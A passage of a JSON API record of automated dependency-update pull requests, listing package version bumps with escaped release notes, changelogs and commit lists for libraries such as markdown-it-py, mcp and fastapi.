releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.2.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003emake_fence_rule()\u003c/code\u003e factory for configurable fence markers by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/394\"\u003eexecutablebooks/markdown-it-py#394\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🚀 RELEASE v4.2.0 by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/395\"\u003eexecutablebooks/markdown-it-py#395\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.1.0...v4.2.0\"\u003ehttps://github.com/executablebooks/markdown-it-py/compare/v4.1.0...v4.2.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.1.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003e--stdin\u003c/code\u003e option to CLI by \u003ca href=\"https://github.com/mcepl\"\u003e\u003ccode\u003e@​mcepl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/379\"\u003eexecutablebooks/markdown-it-py#379\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd AGENTS.md and copilot-setup-steps workflow by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/380\"\u003eexecutablebooks/markdown-it-py#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🔧 Add typing to Scanner by \u003ca href=\"https://github.com/Alunderin\"\u003e\u003ccode\u003e@​Alunderin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/382\"\u003eexecutablebooks/markdown-it-py#382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e👌 Fix quadratic complexity in \u003ccode\u003efragments_join\u003c/code\u003e / \u003ccode\u003etext_join\u003c/code\u003e by \u003ca href=\"https://github.com/petricevich\"\u003e\u003ccode\u003e@​petricevich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/389\"\u003eexecutablebooks/markdown-it-py#389\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨Allow plugins to register inline terminator characters by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/391\"\u003eexecutablebooks/markdown-it-py#391\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨ Add \u003ccode\u003egfm-like2\u003c/code\u003e preset with task lists, alerts, and single-tilde strikethrough by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/388\"\u003eexecutablebooks/markdown-it-py#388\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🔧 Update pre-commit hooks by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/392\"\u003eexecutablebooks/markdown-it-py#392\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🚀 RELEASE v4.1.0 by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/393\"\u003eexecutablebooks/markdown-it-py#393\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mcepl\"\u003e\u003ccode\u003e@​mcepl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/379\"\u003eexecutablebooks/markdown-it-py#379\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/380\"\u003eexecutablebooks/markdown-it-py#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Alunderin\"\u003e\u003ccode\u003e@​Alunderin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/382\"\u003eexecutablebooks/markdown-it-py#382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/petricevich\"\u003e\u003ccode\u003e@​petricevich\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/389\"\u003eexecutablebooks/markdown-it-py#389\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\"\u003ehttps://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/executablebooks/markdown-it-py/blob/master/CHANGELOG.md\"\u003emarkdown-it-py's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.2.0 - 2026-05-07\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003emake_fence_rule()\u003c/code\u003e factory for configurable fence markers in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/394\"\u003e#394\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.1.0 - 2025-05-06\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003egfm-like2\u003c/code\u003e preset with task lists, alerts, and single-tilde strikethrough core plugins in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/388\"\u003e#388\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨ Allow plugins to register inline terminator characters in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/391\"\u003e#391\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e👌 Fix quadratic complexity in \u003ccode\u003efragments_join\u003c/code\u003e / \u003ccode\u003etext_join\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/389\"\u003e#389\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/petricevich\"\u003e\u003ccode\u003e@​petricevich\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e👌 Add \u003ccode\u003e--stdin\u003c/code\u003e option to CLI for reading Markdown from standard input in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/379\"\u003e#379\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/mcepl\"\u003e\u003ccode\u003e@​mcepl\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🔧 Add typing to Scanner in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/382\"\u003e#382\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/Alunderin\"\u003e\u003ccode\u003e@​Alunderin\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\"\u003ehttps://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/36c5f547144df2d01970a5792d68c71a3380b227\"\u003e\u003ccode\u003e36c5f54\u003c/code\u003e\u003c/a\u003e 🚀 RELEASE v4.2.0 (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/395\"\u003e#395\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/96cf077ba5a6b3b4b2f862db7e0fc532694a72e9\"\u003e\u003ccode\u003e96cf077\u003c/code\u003e\u003c/a\u003e ✨ Add \u003ccode\u003emake_fence_rule()\u003c/code\u003e factory for configurable fence markers (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/394\"\u003e#394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/3b4ff6ddd368b679643d12debf09e10ef602d4db\"\u003e\u003ccode\u003e3b4ff6d\u003c/code\u003e\u003c/a\u003e 🚀 RELEASE v4.1.0 (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/393\"\u003e#393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/8951f267370b03a26ae88600a6dfc707ea290067\"\u003e\u003ccode\u003e8951f26\u003c/code\u003e\u003c/a\u003e 🔧 Update pre-commit hooks (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/392\"\u003e#392\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/693bb24063b6c658d60c7c14203ac6470387e3c6\"\u003e\u003ccode\u003e693bb24\u003c/code\u003e\u003c/a\u003e ✨ Add \u003ccode\u003egfm-like2\u003c/code\u003e preset with task lists, alerts, and single-tilde strikethro...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/df6fd361099cab7fe0259467c3aaa3f284ec8259\"\u003e\u003ccode\u003edf6fd36\u003c/code\u003e\u003c/a\u003e ✨Allow plugins to register inline terminator characters (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/391\"\u003e#391\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/d4ea0ca7f44e3ca86c18a87356502c59e5e49ec3\"\u003e\u003ccode\u003ed4ea0ca\u003c/code\u003e\u003c/a\u003e 👌 Fix quadratic complexity in \u003ccode\u003efragments_join\u003c/code\u003e / \u003ccode\u003etext_join\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/389\"\u003e#389\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/89331476e44c150bc32e2597a5fae4cd15391167\"\u003e\u003ccode\u003e8933147\u003c/code\u003e\u003c/a\u003e 🔧 Add typing to Scanner (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/382\"\u003e#382\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/2f6ae107ba32e9a7bd2d00134d09a78ec805a6a0\"\u003e\u003ccode\u003e2f6ae10\u003c/code\u003e\u003c/a\u003e 🔧 Add AGENTS.md and copilot-setup-steps workflow (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/380\"\u003e#380\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/49043e4445d233598fb893bed6949f7b25ae4e27\"\u003e\u003ccode\u003e49043e4\u003c/code\u003e\u003c/a\u003e Add --stdin option to CLI for reading Markdown from standard input (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/379\"\u003e#379\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `matplotlib-inline` from 0.2.1 to 0.2.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/e6e197523ecfabfff1d976e5b6958c3ede948ccb\"\u003e\u003ccode\u003ee6e1975\u003c/code\u003e\u003c/a\u003e release 0.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/0aac2e223483ffbfb5a6076d8c2ca83545cca440\"\u003e\u003ccode\u003e0aac2e2\u003c/code\u003e\u003c/a\u003e Bump the actions group across 1 directory with 2 updates (\u003ca href=\"https://redirect.github.com/ipython/matplotlib-inline/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/6eb2bd89dc8d4d6678478c6b2ec15be7b20d3374\"\u003e\u003ccode\u003e6eb2bd8\u003c/code\u003e\u003c/a\u003e Bump the actions group across 1 directory with 2 updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/631d7dd26be1287f64c5bd4bbb84888903e419b0\"\u003e\u003ccode\u003e631d7dd\u003c/code\u003e\u003c/a\u003e Zizmor hardening (\u003ca href=\"https://redirect.github.com/ipython/matplotlib-inline/issues/66\"\u003e#66\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/8d45c8fc427d39750751bdaa0ffe5abc8e30cd50\"\u003e\u003ccode\u003e8d45c8f\u003c/code\u003e\u003c/a\u003e Zizmor hardening\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/f830b37c728146dca4f947de6cbdb420ee9c69fb\"\u003e\u003ccode\u003ef830b37\u003c/code\u003e\u003c/a\u003e Specify BSD license and add license files (\u003ca href=\"https://redirect.github.com/ipython/matplotlib-inline/issues/62\"\u003e#62\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/e3b8bb10d275d5caa97d8d1b584d48797e494de4\"\u003e\u003ccode\u003ee3b8bb1\u003c/code\u003e\u003c/a\u003e Deprecate Python 3.9 in CI pipeline\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/c783ae72ed581f24fa136f34e6df4f6e99c3f785\"\u003e\u003ccode\u003ec783ae7\u003c/code\u003e\u003c/a\u003e Deprecate Python 3.9 in CI pipeline\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/8ac056c5730a6adbc9dd5e049b85163ba6a09a28\"\u003e\u003ccode\u003e8ac056c\u003c/code\u003e\u003c/a\u003e Update workflow to include matplotlib for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/0cc8a2e91306c94e36f0a9cd8e31a38299b1c126\"\u003e\u003ccode\u003e0cc8a2e\u003c/code\u003e\u003c/a\u003e Use valid SPDX ID\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/matplotlib-inline/compare/0.2.1...0.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mcp` from 1.27.0 to 1.27.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/modelcontextprotocol/python-sdk/releases\"\u003emcp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.27.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[v1.x] ci: deploy docs to py.sdk.modelcontextprotocol.io via Pages artifact by \u003ca href=\"https://github.com/maxisbey\"\u003e\u003ccode\u003e@​maxisbey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/modelcontextprotocol/python-sdk/pull/2635\"\u003emodelcontextprotocol/python-sdk#2635\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[v1.x] Add subject and claims to AccessToken by \u003ca href=\"https://github.com/maxisbey\"\u003e\u003ccode\u003e@​maxisbey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/modelcontextprotocol/python-sdk/pull/2690\"\u003emodelcontextprotocol/python-sdk#2690\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[v1.x] Bind transport sessions to the authenticated principal by \u003ca href=\"https://github.com/maxisbey\"\u003e\u003ccode\u003e@​maxisbey\u003c/code\u003e\u003c/a\u003e in \u003ca h...\n\n_Description has been truncated_","html_url":"https://github.com/joshuwajosh/ForexMindfortemprory/pull/12","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/joshuwajosh%2FForexMindfortemprory/issues/12","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/12/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-01T06:17:12.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4560805006","node_id":"PR_kwDORInWC87hPp17","number":150,"state":"open","title":"deps(pip): Bump the minor-and-patch group across 1 directory with 10 updates","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-01T06:17:12.000Z","updated_at":"2026-06-01T06:18:30.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(pip): Bump","group_name":"minor-and-patch","update_count":10,"packages":[{"name":"fastapi","old_version":"0.136.1","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.45.0","new_version":"0.48.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic","old_version":"2.13.3","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pandas","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/pandas-dev/pandas"},{"name":"python-multipart","old_version":"0.0.26","new_version":"0.0.30","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"reportlab","old_version":"4.4.10","new_version":"4.5.1"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"stripe","old_version":"15.1.0","new_version":"15.2.0","repository_url":"https://github.com/stripe/stripe-python"},{"name":"sentry-sdk","old_version":"2.58.0","new_version":"2.61.0","repository_url":"https://github.com/getsentry/sentry-python"}],"path":null,"ecosystem":"pip"},"body":"Bumps the minor-and-patch group with 10 updates in the /backend directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.1` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.45.0` | `0.48.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.3` | `2.13.4` |\n| [pandas](https://github.com/pandas-dev/pandas) | `3.0.2` | `3.0.3` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.26` | `0.0.30` |\n| [reportlab](https://www.reportlab.com/) | `4.4.10` | `4.5.1` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [stripe](https://github.com/stripe/stripe-python) | `15.1.0` | `15.2.0` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.58.0` | `2.61.0` |\n\n\nUpdates `fastapi` from 0.136.1 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca 